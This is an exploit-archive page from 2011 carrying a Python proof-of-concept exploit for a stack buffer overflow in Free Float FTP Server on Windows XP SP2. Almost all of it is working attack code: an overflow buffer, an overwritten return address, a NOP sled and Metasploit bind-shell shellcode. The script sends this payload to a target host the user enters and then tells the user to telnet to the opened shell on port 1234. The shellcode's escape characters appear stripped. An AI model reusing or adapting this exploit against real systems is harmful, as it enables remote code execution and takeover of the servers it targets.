Home / exploits Free Float FTP Server Buffer Overflow
Posted on 21 August 2011
#!/usr/bin/python #Free Float FTP server Response stack Buffer Overflow Exploit #Tested on: Windows Xp SP2. #Author Debasish Mandal #URL:http://www.facebook.com/raza.whitehat import socket,sys from struct import pack buff = "A"* 251 junk = "A"*5 nop = "x90"*20 eip = pack('<L',0x77F5801C) #Shell code generated by Metasploit frmaework. #Shell Code :: windows/shell/bind_tcp. #Local PORT :: 1234. #Neglected BAD CHARACTERS are "x00","x0a" &x0d". shellcode = ("xbdxe6x09xc6x4fxd9xc4xd9x74x24xf4x5ax33xc9xb1" "x4bx83xc2x04x31x6ax10x03x6ax10x04xfcx3axa7x41" "xffxc2x38x31x89x26x09x63xedx23x38xb3x65x61xb1" "x38x2bx92x42x4cxe4x95xe3xfaxd2x98xf4xcbxdax77" "x36x4axa7x85x6bxacx96x45x7exadxdfxb8x71xffx88" "xb7x20xefxbdx8axf8x0ex12x81x41x68x17x56x35xc2" "x16x87xe6x59x50x3fx8cx05x41x3ex41x56xbdx09xee" "xacx35x88x26xfdxb6xbax06x51x89x72x8bxa8xcdxb5" "x74xdfx25xc6x09xe7xfdxb4xd5x62xe0x1fx9dxd4xc0" "x9ex72x82x83xadx3fxc1xccxb1xbex06x67xcdx4bxa9" "xa8x47x0fx8dx6cx03xcbxacx35xe9xbaxd1x26x55x62" "x77x2cx74x77x01x6fx11xb4x3fx90xe1xd2x48xe3xd3" "x7dxe2x6bx58xf5x2cx6bx9fx2cx88xe3x5excfxe8x2a" "xa5x9bxb8x44x0cxa4x53x95xb1x71xf3xc5x1dx2axb3" "xb5xddx9ax5bxdcxd1xc5x7bxdfx3bx6ex4axfbx97xf9" "xaexfbx13x28x27x1dx71xdcx61xb5xeex1ex56x0ex88" "x61xbdx22x01xf6x8ax2cx95xf9x0bx7bxb5x56xa4xec" "x4exb5x71x0cx51x90xd2x59xc6x6exb2x28x76x6ex9f" "xd9x78xfax1bx48x2ex92x21xadx18x3dxdax98x12xf4" "x4ex63x4dxf9x9ex63x8dxafxf4x63xe5x17xacx37x10" "x58x79x24x89xcdx81x1dx7dx45xe9xa3x58xa1xb6x5c" "x8fx33x8bx8axf6xb1xfdxb8x1ax7a") buff += eip buff += nop buff += shellcode buff += junk HOST = raw_input("Enter the target host : ") PORT = raw_input("Enter the targer port (Default 21): ") print "[*] Connecting to the host "+HOST+" on port "+PORT s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((HOST, int(PORT))) print "[*]Connected to target FTP Server!" except: print "[*] FTP Server didn't respond " sys.exit(0) data=s.recv(1024) print "[*]Sending PAYLOAD to the target server" s.send(buff+' ') print "[*]Exploit Completed..." print "[*]Now telnet to the server on port 1234"
